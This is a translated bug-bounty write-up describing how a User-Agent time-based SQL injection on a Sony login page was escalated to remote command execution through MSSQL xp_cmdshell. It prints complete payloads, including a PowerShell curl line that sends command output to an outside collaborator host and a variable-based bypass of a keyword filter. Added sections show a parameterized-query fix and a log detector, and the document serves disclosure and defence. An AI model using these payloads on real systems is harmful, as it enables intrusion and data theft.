How I extended Time-Based SQL Injection to RCE

Brother



The topic of information security and data protection is extremely relevant for any business, regardless of its size and geography. As part of our blog, we decided to publish notes from foreign colleagues based on their real experience on the topic. We hope that this material will be useful to you.

Foreword

In this article, I will talk about my report sent to Sony as part of a public program on the HackerOne website, as well as how I converted Blind Time-based SQL Injection into full-scale remote OS command execution.

I will cut out important details from the article such as domains, subdomains, command results, my IP address, server IP address, and others.

Reconnaissance stage

For the reconnaissance stage, I used sublist3r on the domain I was interested in to find subdomains.



I checked all the subdomains, but the links were dead. Frustrated, I tried other reconnaissance tools such as amass. Surprisingly, the result was better.

Amass found subdomains for me that cannot be seen in simple Google queries. (Sorry, but I will not show screenshots.) It identified a subdomain of the form special.target.com.

Getting to know the target

Going to the site, I saw that it was something like an admin panel or a page for employee login.



Next, I tried the classic ' character to check for SQL errors. I entered username=123'&password=123'.

I checked the requests in Burp Suite, and the endpoint returned a fruitful 500 error page. Why fruitful? The developers had forgotten to turn off debug mode (or something like that), and this allowed me to see the whole query along with the full paths to the files.


The endpoint is vulnerable to SQL injection against Microsoft SQL Server.

The exploit itself

I tried simple boolean SQL injection on the username parameter, but with no success: I was getting errors in response to any payload. After re-examining the error in the response, I realized that my User-Agent header was being passed to the database. I appended a single quote and a comment, '--, to my User-Agent, and finally got the normal, correct page.

Code:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36'--



A good sign that the server is executing user-supplied input as SQL. Then I tested time-based SQL injection to see whether stacked queries were possible.

Code:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36';WAITFOR DELAY '00:00:05';--

The answer was delayed by about 5 seconds.



This confirms that we can stack queries and inject whatever statements we need.
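As an added example (not code from the write-up or from the affected application), here is the root cause and its fix side by side: the User-Agent concatenated into a multi-statement batch, versus the same insert with a bound parameter. sqlite3 stands in for MSSQL, and the table name and header values are constructed.

```python
import sqlite3

# sqlite3 stands in for the MSSQL server in the write-up: executescript() runs several
# statements per call, the same property the WAITFOR DELAY test confirmed on the real target.
# Constructed sample header in the style of the page's payloads: the quote closes the
# literal and ';' starts a second, attacker-chosen statement.
STACKED_UA = "Mozilla/5.0'); INSERT INTO login_log(user_agent) VALUES('stacked"
NORMAL_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login_log (id INTEGER PRIMARY KEY, user_agent TEXT)")
    return conn


def logged_agents(conn):
    return [row[0] for row in conn.execute("SELECT user_agent FROM login_log ORDER BY id")]


def log_login_vulnerable(conn, user_agent):
    # Root cause described on the page: the header is concatenated into the SQL text,
    # so the database parses whatever the client sent as part of the statement batch.
    sql = "INSERT INTO login_log(user_agent) VALUES('" + user_agent + "');"
    conn.executescript(sql)
    return logged_agents(conn)


def log_login_parameterized(conn, user_agent):
    # Fix: the header travels as a bound parameter; the driver never parses it as SQL,
    # so quotes and ';' inside it are stored as data and no second statement can appear.
    conn.execute("INSERT INTO login_log(user_agent) VALUES(?)", (user_agent,))
    conn.commit()
    return logged_agents(conn)


if __name__ == "__main__":
    print("vulnerable:", log_login_vulnerable(fresh_db(), STACKED_UA))        # two rows
    print("parameterized:", log_login_parameterized(fresh_db(), STACKED_UA))  # one row, stored verbatim
```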

Extending SQL Injection to RCE

Since we now know that we can stack queries, we need to find a way to execute OS commands from here. Unlike MySQL, MSSQL has a built-in way to execute commands. I used the information from the article by Prashant Kumar. Note that xp_cmdshell is disabled by default and enabling it requires server-level configuration permissions, so the fact that the payload below works also shows that the application's database login had far more privilege than a login form needs.

It turned out that you can execute OS commands using xp_cmdshell, so I enabled xp_cmdshell on the server.

Code:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;--

Then I tested the blind RCE with a ping:

Code:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36'; EXEC xp_cmdshell 'ping myburpcollablink.burpcollaborator.net';--



Fine! The Burp Suite Collaborator client received the request. This confirms that we can perform RCE.

Unlike Prashant Kumar, I did not save the results of command execution to the database; instead, I created a non-destructive way of reading the output of the OS commands.

I assigned the output to a variable in PowerShell and sent it to my Burp Collaborator using curl.

It works like this:
Code:
powershell -c "$x = whoami; curl http://my-burp-link.burpcollaborator.net/get?output=$x"

The command captures the output of whoami and sends it to my Burp Collaborator link.

The finished RCE payload looks like this:
Code:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36';EXEC xp_cmdshell 'powershell -c "$x = whoami; curl http://my-burp-link.burpcollaborator.net/get?output=$x"';--

The command results are sent to me.



I was also able to extract metadata information for AWS EC2 instances, view server files, and more.

Bypassing the "fix"

A few days later, Sony informed me that they had deployed a patch. I tried to run my old payload, but it was blocked by a firewall. I saw that the company had added the keyword EXEC xp_cmdshell to the filter.

I bypassed the filter by declaring a variable @x with the value xp_cmdshell and running the command as EXEC @x.

Code:
'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' --
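An added detection example, not part of the original report: it scans constructed access-log lines for the indicators that appear throughout this write-up (the stacked-query terminator, WAITFOR DELAY, sp_configure, xp_cmdshell) and for the EXEC-of-a-variable form that defeated the narrow keyword filter described above. The log lines, the 203.0.113.5 address and the collab.example hostname are constructed placeholders.

```python
import re

# Indicators of the technique in the write-up, matched against the raw User-Agent.
# The narrow substring the page says the vendor filtered ("EXEC xp_cmdshell") is only
# one of them; the exec-of-variable rule catches the DECLARE @x ... EXEC @x form.
INDICATORS = {
    "quote-then-terminator": re.compile(r"'\s*;"),                  # '; closes a literal, starts a stacked statement
    "time-delay": re.compile(r"\bWAITFOR\s+DELAY\b", re.I),
    "sp_configure": re.compile(r"\bsp_configure\b", re.I),
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b", re.I),
    "exec-of-variable": re.compile(r"\bEXEC(?:UTE)?\s+@\w+", re.I),   # EXEC @x ... (keyword-filter bypass)
    "trailing-comment": re.compile(r"--\s*$"),
}

# Combined Log Format keeps the User-Agent as the last quoted field (Apache escapes inner quotes as \").
UA_RE = re.compile(r'"((?:[^"\\]|\\.)*)"\s*$')


def keyword_filter_hit(user_agent):
    """The narrow check the page describes: blocks only the literal phrase EXEC xp_cmdshell."""
    return "exec xp_cmdshell" in user_agent.lower()


def user_agent_of(line):
    m = UA_RE.search(line)
    return m.group(1) if m else ""


def scan_log(lines):
    findings = []
    for n, line in enumerate(lines, 1):
        ua = user_agent_of(line)
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(ua))
        findings.append({"line": n, "user_agent": ua, "indicators": hits,
                         "keyword_filter_hit": keyword_filter_hit(ua)})
    return findings


def access_line(ts, status, ua):
    # Constructed log line; 203.0.113.5 and collab.example are documentation placeholders.
    return f'203.0.113.5 - - [{ts}] "POST /login HTTP/1.1" {status} 512 "-" "{ua}"'


LOG_LINES = [  # constructed sample mirroring the payload progression in the write-up
    access_line("14/Sep/2021:10:00:01 +0000", 200, "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"),
    access_line("14/Sep/2021:10:00:09 +0000", 200, "Mozilla/5.0';WAITFOR DELAY '00:00:05';--"),
    access_line("14/Sep/2021:10:01:30 +0000", 200, "Mozilla/5.0'; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;--"),
    access_line("21/Sep/2021:12:00:00 +0000", 403, "Mozilla/5.0'; EXEC xp_cmdshell 'ping collab.example';--"),
    access_line("21/Sep/2021:12:05:00 +0000", 200, "Mozilla/5.0'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping collab.example' --"),
]
```

Run scan_log(LOG_LINES): the fourth line is the only one the keyword filter stops, while the fifth still carries xp_cmdshell, the stacked-query terminator and an EXEC of a variable, which is why the fix has to be parameterized queries and a least-privilege database login rather than a blocklist.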

Chronicle of events

  • September 14, 2021 → first report sent
  • September 16, 2021 → report verified by Hackerone
  • September 21, 2021 → the first patch is deployed (I bypassed it)
  • September 23, 2021 → another patch deployed (I bypassed it again)
  • September 26, 2021 → final patch deployed
  • September 27, 2021 → vulnerability marked fixed, bounty paid.